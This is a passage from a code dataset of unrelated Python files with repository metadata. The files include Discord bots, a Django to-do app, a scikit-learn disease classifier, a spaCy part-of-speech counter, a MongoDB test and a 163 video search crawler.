bot.run(f\"{os.getenv('TOKEN')}\")\n", "repo_name": "Maximilian1021/GameEnergyInfraV2", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 
11, "usage_type": "name"}, {"api_name": "discord.ext.commands.when_mentioned_or", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.Intents.all", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 11, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "discord.Activity", "line_number": 27, "usage_type": "call"}, {"api_name": "discord.ActivityType", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.Status", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 65, "usage_type": "call"}, {"api_name": "discord.Colour.red", "line_number": 65, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 65, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Context", "line_number": 73, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 73, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Colour.red", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "35514484176", "text": "import logging\nlogger = logging.getLogger(\"pythran\")\n\n# Initialize logging\ntry:\n # Set a nice colored output\n from colorlog import ColoredFormatter\n formatter = ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(blue)s%(message)s\",\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n }\n )\n stream = logging.StreamHandler()\n stream.setFormatter(formatter)\n logger.addHandler(stream)\nexcept ImportError:\n # No color available, use default config\n logging.basicConfig(format='%(levelname)s: %(message)s')\n logger.warn(\"Disabling color, you really want to install colorlog.\")\n", "repo_name": "genekh/python", "sub_path": "compilers/pythran/pythran/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 756, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 2, "usage_type": "call"}, {"api_name": "colorlog.ColoredFormatter", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "24789782359", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport sklearn\n\n\n# In[2]:\n\n\ndf = pd.read_csv('dataset.csv')\ndf.head()\n\n\n# In[3]:\n\n\ncols = df.columns\ndata = df[cols].values.flatten()\n\n\n# In[4]:\n\n\ns = pd.Series(data)\ns = s.str.strip()\ns = s.values.reshape(df.shape)\n\n\n# In[5]:\n\n\ndf = pd.DataFrame(s, columns=df.columns)\ndf = df.fillna(0)\n\n\n# In[6]:\n\n\ndf1 = pd.read_csv('Symptom-severity.csv')\nvals = df.values\n\n\n# In[7]:\n\n\nsymptoms = df1['Symptom'].unique()\n\n\n# In[8]:\n\n\nfor i in range(len(symptoms)):\n vals[vals==symptoms[i]] = df1[df1['Symptom'] == symptoms[i]]['weight'].values[0]\n\n\n# In[9]:\n\n\nd = pd.DataFrame(vals, columns=cols)\nd.head(100)\n\n\n# In[10]:\n\n\nimport joblib\nimport 
streamlit\n\n\n# In[11]:\n\n\nd = d.replace('dischromic _patches', 0)\nd = d.replace('spotting_ urination', 0)\ndf = d.replace('foul_smell_of urine', 0)\ndf.head()\n\n\n# In[12]:\n\n\ndata = df.iloc[:, 1:].values\nlabels = df['Disease'].values\n\n\n# In[13]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[14]:\n\n\nx_train, x_test, y_train, y_test = train_test_split(data, labels, shuffle=True, train_size=0.85)\n\n\n# In[15]:\n\n\nprint(x_train.shape, x_test.shape, y_train.shape, y_test.shape)\n\n\n# In[16]:\n\n\nfrom sklearn.svm import SVC\n\n\n# In[17]:\n\n\nmodel = SVC()\nmodel.fit(x_train, y_train)\n\n\n# In[18]:\n\n\npreds = model.predict(x_test)\n\n\n# In[28]:\n\n\npreds\n\n\n# In[19]:\n\n\nfrom sklearn.metrics import f1_score, accuracy_score, confusion_matrix\nimport seaborn as sns\n\n\n# In[ ]:\n\n\n\n\n\n# In[20]:\n\n\nconf_mat = confusion_matrix(y_test, preds)\ndf_cm = pd.DataFrame(conf_mat, index=df['Disease'].unique(), columns=df['Disease'].unique())\nprint('F1-score% =', f1_score(y_test, preds, average='macro')*100, '|', 'Accuracy% =', accuracy_score(y_test, preds)*100)\nsns.heatmap(df_cm)\n\n\n# In[21]:\n\n\nmodel.score(data, labels)\n\n\n# In[22]:\n\n\njoblib.dump(model, 'svc_model.pkl')\n\n\n# In[23]:\n\n\ndf.head()\n\n\n# In[25]:\n\n\ndf.head(50)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "siranjeevi21/Disease-prediction", "sub_path": "model.py.py", "file_name": "model.py.py", "file_ext": "py", "file_size_in_byte": 1978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 152, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 153, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "15755756295", "text": "\"\"\" A script for counting POS tag usage by each candidate.\n \"\"\"\n\n# Imports and initiations\nimport spacy, os, collections\nnlp = spacy.load('en_core_web_lg')\n\nfor filename in os.listdir('results'):\n if filename.endswith(\".txt\"):\n tag_dict = collections.defaultdict(int)\n pos_dict = collections.defaultdict(int)\n\n # Load files\n fileText = open(\"results/\" + str(filename)).read()\n doc = nlp(fileText)\n\n # Count POS tags, both granularities\n for token in doc:\n tag_dict[token.tag_] += 1\n pos_dict[token.pos_] += 1\n\n with open('results/pos/' + str(filename), 'w') as f:\n print(\"Coarse-Grained Tags\", file=f)\n print(\"Tag\\tCount\\n\", file=f)\n for key, value in pos_dict.items():\n print(str(key) + \"\\t\" + str(value), file=f)\n\n print(\"\\n\\n\\nFine-Grained Tags\", file=f)\n 
print(\"Tag\\tCount\\n\", file=f)\n for key, value in tag_dict.items():\n print(str(key) + \"\\t\" + str(value), file=f)\n f.close()\n else:\n pass\n", "repo_name": "jradishness/pdc", "sub_path": "posProcessing.py", "file_name": "posProcessing.py", "file_ext": "py", "file_size_in_byte": 1092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "spacy.load", "line_number": 6, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "19142877912", "text": "# slimebot.py\nimport os\nimport time\nimport json\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\nfrom imagetest import slime_image, valid_image_url\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\nADMIN_ID = os.getenv('ADMIN_ID')\n\nbot = commands.Bot(command_prefix='sb ')\n\nslime_word_dict = {}\nblack_list_dict = {}\n\n\ndef write_slime_dict_to_file():\n print(f\"this method was called\")\n with open('slimelist.json', 'w') as slime_list_file_descriptor:\n global slime_word_dict\n json.dump(slime_word_dict, slime_list_file_descriptor)\n\n\ndef write_blacklist_dict_to_file():\n with open('blacklist.json', 'w') as black_list_file_descriptor:\n global black_list_dict\n json.dump(black_list_dict, black_list_file_descriptor)\n\n\nasync def send_image(channel, slimed_image):\n try:\n await channel.send(\"Sure thing\", file=discord.File(slimed_image))\n except discord.errors.HTTPException as e: # mostly concerned about 413 payload too large\n await channel.send(\"Sorry, the finished image is too large. 
If only bots could have\"\n \" Nitro.\", file=discord.File(\"./images/src/SlimeSorry.png\"))\n\n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n if guild.name == GUILD:\n break\n\n with open('slimelist.json') as slime_list_file_descriptor, open(\n 'blacklist.json') as black_list_file_descriptor:\n global slime_word_dict\n global black_list_dict\n slime_word_dict = json.load(slime_list_file_descriptor)\n black_list_dict = json.load(black_list_file_descriptor)\n\n print(\n f'{bot.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n members = '\\n - '.join([member.name for member in guild.members])\n print(f'Guild Members:\\n - {members}')\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n if message.author == bot.user:\n return\n\n if message.content.split(' ')[0] == \"sb\": # does nothing if the user enters a slimebot command\n return\n\n if isinstance(message.channel, discord.DMChannel):\n return\n\n changed_list = False\n word_list = message.content.split(' ')\n for word in word_list:\n if word in slime_word_dict:\n changed_list = True\n original_submitter = bot.get_user(slime_word_dict[word][\"id\"]).mention\n submission_time = time.ctime(slime_word_dict[word][\"time\"])\n response_message = (f\"{message.author.mention} said the slimeword: {word}!\\n\"\n f\" it was added by {original_submitter}\"\n f\" on {submission_time}\")\n slime_word_dict.__delitem__(word)\n black_list_dict[word] = time.time()\n slime_image(f\"{message.author.avatar_url}\")\n await send_image(message.channel, \"./images/result.webp\")\n if changed_list:\n write_slime_dict_to_file()\n\n\n@bot.command(name='addwords', help='dm this bot a list of words in the format: \"addwords word1 word2 word3\"')\nasync def add_words(ctx):\n if isinstance(ctx.channel, discord.DMChannel):\n word_list = ctx.message.content.split(' ')\n del word_list[0:2] # removes the command words\n for word in word_list:\n if word not in slime_word_dict and word not in black_list_dict:\n submission_info = {\"id\": ctx.author.id, \"time\": time.time()}\n slime_word_dict[word] = submission_info\n else:\n word_list.remove(word)\n await ctx.send(f\" You added the following words: {word_list}\")\n write_slime_dict_to_file()\n else:\n await ctx.send(f\"dm this bot a list of words in the format: addwords word1 word2 word3\")\n\n\n@bot.command(name='blacklistwords', help='dm this bot a list of words to blacklist, this words will be removed from '\n 'the slime list pool and not addable again: \"blacklistwords word1, word2, '\n 'word3\"')\nasync def blacklist_words(ctx):\n if isinstance(ctx.channel, discord.DMChannel):\n word_list = ctx.message.content.split(' ')\n del word_list[0:2] # removes the command words\n for word in word_list:\n if word not in black_list_dict:\n submission_info = {\"id\": ctx.author.id, \"time\": time.time()}\n black_list_dict[word] = submission_info\n if word in slime_word_dict:\n slime_word_dict.__delitem__(word)\n else:\n word_list.remove(word)\n await ctx.send(f\" You added the following words to the blacklist: {word_list}\")\n write_blacklist_dict_to_file()\n else:\n await ctx.send(f\"dm this bot a list of words in the format: blacklistwords word1 word2 word3\")\n\n\n@bot.command(name='slime', help='send me an image or a link to an image and I will silime it, to get slimed say '\n '\\\"slime me\\\"')\nasync def slime_this(ctx, *args):\n if args:\n if args[0] == \"me\":\n slimed_image = slime_image(f\"{ctx.author.avatar_url}\")\n await 
send_image(ctx.channel, slimed_image)\n return\n\n for role in ctx.message.role_mentions:\n for user in role.members:\n slimed_image = slime_image(f\"{user.avatar_url}\")\n await send_image(ctx.channel, slimed_image)\n\n for user in ctx.message.mentions:\n slimed_image = slime_image(f\"{user.avatar_url}\")\n await send_image(ctx.channel, slimed_image)\n\n for arg in args:\n arg = str(arg).strip('<>')\n if valid_image_url(arg):\n slimed_image = slime_image(arg)\n await send_image(ctx.channel, slimed_image)\n\n for attachment in ctx.message.attachments:\n attachment_url = attachment.url\n print(attachment_url)\n if valid_image_url(attachment_url):\n slimed_image = slime_image(attachment_url)\n await send_image(ctx.channel, slimed_image)\n\n\n@bot.command(name='fix', help='If slime bot is not working the way you would expect, send the dev a description '\n 'of the problem so that they can fix it, please include as much relevant'\n 'information as you can. You may be contacted for more information by the dev.'\n ' Note that slimebot is running on an old computer, and may be'\n 'very slow at times. This is in itself not considered a reportable problem')\nasync def fix_me(ctx, *args):\n if args:\n author = ctx.message.author.mention\n message_to_admin = f\"{author} has reported the following problem: {ctx.message.content}\"\n try:\n admin_id_int = int(ADMIN_ID)\n except ValueError:\n await ctx.channel.send(\"If you see this message it means even the error reporting is broken!!\")\n admin = bot.get_user(admin_id_int)\n await admin.send(message_to_admin)\n attachment_message = \"the following attachments were included: \"\n for attachment in ctx.message.attachments:\n await admin.send(f\"{attachment_message}{attachment.url}\")\n return\n await ctx.channel.send(\"You need to add a description of the problem!\")\n\n\nbot.run(TOKEN)\n\n# add procedurly generated slime\n# add progressive sliming\n# add animated slimeq\n# add animated slime to gifs\n", "repo_name": "CharlesMogan/SlimeBot", "sub_path": "slimebot2/slimebot.py", "file_name": "slimebot.py", "file_ext": "py", "file_size_in_byte": 7503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 15, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 36, "usage_type": "call"}, {"api_name": "discord.errors", "line_number": 37, "usage_type": "attribute"}, {"api_name": "discord.File", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 53, "usage_type": "call"}, {"api_name": "discord.DMChannel", "line_number": 72, "usage_type": "attribute"}, {"api_name": "time.ctime", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 87, "usage_type": "call"}, {"api_name": "discord.DMChannel", "line_number": 95, "usage_type": "attribute"}, 
{"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "discord.DMChannel", "line_number": 114, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 119, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 136, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 142, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 146, "usage_type": "call"}, {"api_name": "imagetest.valid_image_url", "line_number": 151, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 152, "usage_type": "call"}, {"api_name": "imagetest.valid_image_url", "line_number": 158, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "9779442479", "text": "## ----------------------------------------\n## Test de stockage de fichier dans mongodb\n## ----------------------------------------\n\nfrom pymongo import MongoClient, collection\nimport datetime\n\nSERVER='localhost'\nPORT=27017\n\ndef log(msg=\"\"):\n\t\"\"\"\n\tPetite routine de log\n\t\"\"\"\n\td = datetime.datetime.now()\n\tts = d.strftime(\"%j %X %f\")\n\tprint(\"%s : %s\" % (ts, msg) )\n\nclass Document(object):\n\t\"\"\"\n\tLa classe de base : Document\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.name = \"\"\n\t\tself.titre = \"\"\n\t\tself.description = \"\"\n\t\tself.version = \"\"\n\nclass DB(object):\n\t\"\"\"\n\tLa classe DB Database \n\t\"\"\"\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.db_cli = MongoClient(SERVER, PORT)\n\t\t## Creation Base de donnée\n\t\tself.db = self.db_cli[name]\n\t\ttry:\n\t\t\tself.doc = self.db['DOC']\n\t\t\tlog(\"Modele cree ...\")\n\t\texcept:\n\t\t\tself.doc = self.create_modele()\n\t\t\tlog(\"Creation du modele ...\")\n\n\tdef __str__(self):\n\t\treturn \"DB:%s %s\" % (self.name, self.db.collection_names())\n\n\tdef create_Doc(self, doc):\n\t\t\"\"\"\n\t\tcreation d'un document\n\t\t\"\"\"\n\t\tpass\n\n\tdef create_modele(self):\n\t\td = { 'nom':'root', 'meta':{\n\t\t\t\t\t\t\t\t\t'type':'DIR'\t\n\t\t\t\t\t\t\t\t\t}\n\t\t\t}\n\t\tself.db.DOC.insert(d)\n\t\treturn self.db.DOC\n\n\tdef purge(self):\n\t\tself.db.DOC.remove()\n\n\tdef close(self):\n\t\tself.db_cli.close()\n\n\nif __name__ == '__main__':\n\tD = DB('TEST')\n\td1 = { 'nom':'fichier1', 'meta_type':'FIC', 'FIC_TYPE':'TXT' }\n\td2 = { 'nom':'fichier2', 'meta_type':'FIC', 'FIC_TYPE':'TXT' }\n\tD.db.DOC.insert(d1)\n\tD.db.DOC.insert(d2)\n\tprint (\"Database : %s \" % D)\n\tfor doc in D.db.DOC.find():\n\t\tprint( \"doc : \", doc )\n\tD.purge()\n\tD.close()\n\n", "repo_name": "chrislyon/chris-p32-svged", "sub_path": "vsged/DB.py", "file_name": "DB.py", "file_ext": "py", "file_size_in_byte": 1579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "34695887696", "text": "#Reads a textfile with random numbers and plots it\r\n\r\n#imports packages\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#open the random numbers file\r\nfile = open(\"random_numbers.txt\")\r\n\r\n\r\n#reads the lines\r\nline = file.readlines()\r\n\r\n#makes an array of all the numbers to plot them\r\ni=0\r\nx=[]\r\nfor i in range(0,len(line)):\r\n x.append(float(line[i]))\r\n# an 
array of random numbers using our Random class\r\nfile.close()\r\nprint(x)\r\n\r\n#plots the histogram\r\nplt.hist(x,bins= 25) \r\nplt.xlabel('x')\r\nplt.ylabel('Probability')\r\nplt.title('Uniform random number')\r\nplt.grid(True)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n", "repo_name": "Raxxak/PHSX815_Week1", "sub_path": "Random_reader.py", "file_name": "Random_reader.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.hist", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "40744809889", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom .models import Tasks\n\n\n# to display all task listing\ndef index(request):\n tasks = Tasks.objects.all()\n context = {\n 'tasks': tasks\n }\n return render(request, './SimpleTodo/task_listing.html', context)\n\n\n# to add task\ndef add_task(request):\n if request.method == \"POST\":\n new_task = request.POST['newTask']\n tasks = Tasks(task_title=new_task)\n tasks.save()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n\n# to edit task\ndef edit_task(request, task_id):\n task = get_object_or_404(Tasks, pk=task_id)\n context = {\n 'task': task\n }\n return render(request, './SimpleTodo/edit_task.html', context)\n\n\n# save the edit changes\ndef save_edit_task(request, task_id):\n if request.method == \"POST\":\n tasks = get_object_or_404(Tasks, pk=task_id)\n tasks.task_title = request.POST['newTaskTitle']\n tasks.save()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n\n# delete task\ndef delete_task(request, task_id):\n tasks = get_object_or_404(Tasks, pk=task_id)\n tasks.delete()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n\n# change the status of the task('completed' or 'pending')\ndef update_task_status(request, task_id):\n tasks = get_object_or_404(Tasks, pk=task_id)\n if request.method == \"GET\":\n if tasks.task_status:\n tasks.task_status = False\n else:\n tasks.task_status = True\n tasks.save()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n", "repo_name": "abhi1263/learningDjango", "sub_path": "src/SimpleTodo/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Tasks.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "models.Tasks.objects", "line_number": 9, "usage_type": "attribute"}, 
{"api_name": "models.Tasks", "line_number": 9, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 20, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 59, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "7980650342", "text": "# -*- coding: utf-8 -*-\n################################################################################################################\n# @file: one63query.py\n# @author: HeDian\n# @date: 2016/12/22\n# @version: Ver0.0.0.100\n# @note: \n################################################################################################################\nfrom configuration.constant import SPIDER_S2_WEBSITE_VIDEO\nfrom lxml import etree\nimport math\n\nfrom configuration.environment.configure import SpiderConfigure\nfrom utility.common import Common\nfrom utility.regexutil import RegexUtility\nfrom utility.xpathutil import XPathUtility\nfrom website.common.s2query import SiteS2Query\nfrom log.spiderlog import Logger\nfrom utility.timeutility import TimeUtility\nimport datetime\n\n\n################################################################################################################\n# @class:One63S2Query\n# @author:HeDian\n# @date:2016/12/22\n# @note:\n################################################################################################################\nclass One63S2Query(SiteS2Query):\n QUERY_TEMPLATE = 'http://so.v.163.com/search/000-{period}-0000-1-{page}-{order}-{key}/'\n DEFAULT_PAGE_SIZE = 20\n S2QUERY_FIRST_PAGE = 'S2QUERY_FIRST_PAGE'\n S2QUERY_EACH_PAGE = 'S2QUERY_EACH_PAGE'\n WEEKLY = '2'\n MONTHLY = '3'\n ALL = '0'\n ORDER = '2' #按照发布时间排序\n\n\n ################################################################################################################\n # @functions:__init__\n # @param: none\n # @return:none\n # @note:One63S2Query,初始化内部变量\n ################################################################################################################\n def __init__(self):\n # 使用该URL识别回传S2查询结果的类,推荐使用主站URL\n SiteS2Query.__init__(self)\n self.fakeoriginalurl = 'http://v.163.com/'\n self.r = 
RegexUtility()\n\n ################################################################################################################\n # @functions:getsearchresult\n # @params:输入参数\n # @return:none\n # @note:得到传入的检索结果页面的所有\n ################################################################################################################\n def getsearchresult(self, params):\n info = params.customized['query']\n\n xpath = XPathUtility(html=params.content)\n hrefs = xpath.xpath('//li/h3/a/@href')\n titles = xpath.getlist('//li/h3/a')\n pubtimes = xpath.xpath('//li/p')\n\n today = datetime.datetime.strptime(TimeUtility.getcurrentdate(), TimeUtility.DATE_FORMAT_DEFAULT).date()\n\n urllist = []\n for index in range(0, len(titles), 1):\n # 标题中包含指定要查询的关键字\n # if titles[index].find(info) > -1:\n if Common.checktitle(info, titles[index]):\n pubtimestr = TimeUtility.getuniformdate(pubtimes[index].text)\n pubtime = datetime.datetime.strptime(pubtimestr, TimeUtility.DATE_FORMAT_DEFAULT).date()\n inteveral = today - pubtime\n # 时间在指定周期内\n if inteveral.days <= self.querylastdays:\n urllist.append(hrefs[index])\n else:\n # 因为是按照时间排序的,第一条时间不满足检索周期的话,后面所有的都不满足。\n break\n\n if len(urllist) > 0:\n self.__storeurllist__(urllist, SPIDER_S2_WEBSITE_VIDEO)\n ################################################################################################################\n # @functions:query\n # @info: query condition\n # @return:none\n # @note:SiteS2Query,S2 query\n ################################################################################################################\n def query(self, info):\n keyvalue = Common.urlenc(info)\n\n # step1: 根据key, 拼出下面的url\n if self.querylastdays <= 7:\n periodvalue = self.WEEKLY\n elif self.querylastdays <= 30:\n periodvalue = self.MONTHLY\n else:\n periodvalue = self.ALL\n urls = [One63S2Query.QUERY_TEMPLATE.format(period = periodvalue, page = 1, order = self.ORDER, key = keyvalue)]\n Logger.getlogging().debug(urls[0])\n self.__storeqeuryurllist__(urls, self.S2QUERY_FIRST_PAGE, {'query':info, 'period':periodvalue})\n\n ################################################################################################################\n # @functions:process\n # @params: see WebSite.process\n # @return:none\n # @note:SiteS2Query, process S2 query result,一般为查询到的URL列表\n ################################################################################################################\n def process(self, params):\n if params.step == One63S2Query.S2QUERY_FIRST_PAGE:\n #Step2: 根据返回内容,通过xpath: //*[@data-search-page=\"item\"] 得到最大page数、(返回数组的倒数第二位)\n info = params.customized['query']\n periodvalue = params.customized['period']\n keyvalue = Common.urlenc(info)\n\n # 得到检索结果总件数\n html = etree.HTML(params.content)\n nodes = html.xpath('//*[contains(@class,\"result\")]/span')\n # 获取不到,则返回\n if len(nodes) == 0:\n return\n\n # 获取最后一页的页数\n try:\n page_count = int(math.ceil(float(nodes[0].text) / self.DEFAULT_PAGE_SIZE))\n except:\n page_count = 1\n\n # 获取当前页的检索结果\n self.getsearchresult(params)\n\n # 根据上面的page_count数,拼出除了首页之外的所有的搜索结果url\n querylist = []\n for page in range(2, page_count + 1, 1):\n url = One63S2Query.QUERY_TEMPLATE.format(period = periodvalue, page = page, order = self.ORDER, key = keyvalue)\n Logger.getlogging().debug(url)\n querylist.append(url)\n self.__storeqeuryurllist__(querylist, One63S2Query.S2QUERY_EACH_PAGE, {'query':info})\n\n elif params.step == One63S2Query.S2QUERY_EACH_PAGE:\n # Step3: 根据Step2的url,通过xpath获取搜索结果的url,把url写入文件\n self.getsearchresult(params)", "repo_name": 
"ErBingBing/django-tonado-crawler", "sub_path": "ZG-PhaseFour/code/website/onesixthree/one63query.py", "file_name": "one63query.py", "file_ext": "py", "file_size_in_byte": 6559, "program_lang": "python", "lang": "de", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "website.common.s2query.SiteS2Query", "line_number": 29, "usage_type": "name"}, {"api_name": "website.common.s2query.SiteS2Query.__init__", "line_number": 48, "usage_type": "call"}, {"api_name": "website.common.s2query.SiteS2Query", "line_number": 48, "usage_type": "name"}, {"api_name": "utility.regexutil.RegexUtility", "line_number": 50, "usage_type": "call"}, {"api_name": "utility.xpathutil.XPathUtility", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utility.timeutility.TimeUtility.getcurrentdate", "line_number": 66, "usage_type": "call"}, {"api_name": "utility.timeutility.TimeUtility", "line_number": 66, "usage_type": "name"}, 